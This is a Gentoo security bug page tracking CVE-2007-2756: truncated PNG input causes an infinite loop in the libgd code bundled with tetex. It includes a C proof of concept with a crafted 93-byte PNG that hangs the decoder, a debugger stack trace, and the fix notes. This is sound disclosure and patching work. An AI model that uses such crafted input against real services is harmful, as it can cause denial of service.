Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 182055 - app-text/tetex < 3.0_p1-r4 Possible infinite loop in included libgd/gd_png.c (inside png_set_read_fn() callback) with truncated input (CVE-2007-2756)
Summary: app-text/tetex < 3.0_p1-r4 Possible infinite loop in included libgd/gd_png.c ...
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High major
Assignee: Gentoo Security
URL: http://www.mandriva.com/security/advi...
Whiteboard: B3? [glsa]
Keywords:
Depends on: 170861 179154
Blocks:
  Show dependency tree
 
Reported: 2007-06-14 19:53 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2007-09-28 08:52 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-06-14 19:53:17 UTC 
It appears that gd is also included by tetex.

+++ This bug was initially created as a clone of Bug #179154 +++

The following test case using libgd 2.0.34 apparently leads to an infinite loop in the libpng decoder. 
 The infinite loop seems to occur between the libpng code (png_read_data()) and the libgd callback (gdPngReadData()) which may not properly detect truncated input. The libpng’s png_read_info() function hence never returns, and the library consumme 100% CPU. 
/* id: gdbad3.c, Xavier Roche, May. 2007 */
/* gcc gdbad3.c -o bad -lgd && ./bad */

#include <stdio.h>
#include <stdlib.h>
#include "gd.h"

static const unsigned char pngdata[93];
int main(void) {
  gdImagePtr im;
  if ( ( im = gdImageCreateFromPngPtr(93, (char*) &pngdata[0]) ) != NULL) {
    fprintf(stderr, "success!\n");
    gdImageDestroy(im);
  } else {
    fprintf(stderr, "failed!\n");
  }
  return 0;
}

/* PNG data */
static const unsigned char pngdata[93] = {137,80,78,71,13,10,26,10,0,0,
0,13,73,72,68,82,0,0,0,120,0,0,0,131,8,6,0,0,0,70,49,223,8,0,0,0,6,98,
75,71,68,0,255,0,255,0,255,160,189,167,147,0,0,0,9,112,72,89,115,0,0,92,
70,0,0,92,70,1,20,148,67,65,0,0,0,9,118,112,65,103,0,0,0,120,0,0,0,131,
0,226,13,249,45};

 Typical stack: 
(gdb) where
#0  gdPngReadData (png_ptr=0x501090, data=0x501570 "", length=5247120) at gd_png.c:83
#1  0x00002af9ef5ab192 in png_read_data (png_ptr=0x501090, data=0x501570 "", length=9) at pngrio.c:33
#2  0x00002af9ef5a1935 in png_crc_read (png_ptr=0x501090, buf=0x501570 "", length=9) at pngrutil.c:96
#3  0x00002af9ef5a1a17 in png_crc_finish (png_ptr=0x501090, skip=5248368) at pngrutil.c:116
#4  0x00002af9ef5a425a in png_handle_unknown (png_ptr=0x501090, info_ptr=0x505ae0, length=9)
    at pngrutil.c:2221
#5  0x00002af9ef5a9e0d in png_read_info (png_ptr=0x501090, info_ptr=0x505ae0) at pngread.c:530
#6  0x00002af9eeb2baf9 in gdImageCreateFromPngCtx (infile=0x501010) at gd_png.c:189
#7  0x00002af9eeb2b9b0 in gdImageCreateFromPngPtr (size=5247120, data=0x501570) at gd_png.c:111
#8  0x00000000004006df in main ()

 (if you ‘up’ to png_read_info() and try ‘finish’, you’ll see that this function never returns due to endless calls to gdPngReadData())
Comment 1 Robert Buchholz (RETIRED) gentoo-dev 2007-09-01 17:17:01 UTC 
Fixed in app-text/tetex-3.0_p1-r4 by linking to the system libgd instead of the libgd sources shipped with tetex. As #179154 is fixed, so should this one (transitivity++).
Comment 2 Pierre-Yves Rofes (RETIRED) gentoo-dev 2007-09-01 22:08:18 UTC 
ok thanks for the info. stabling of version 3.0_p1-r4 is handled with bug 170861.
Comment 3 Pierre-Yves Rofes (RETIRED) gentoo-dev 2007-09-28 08:52:02 UTC 
GLSA 200709-17.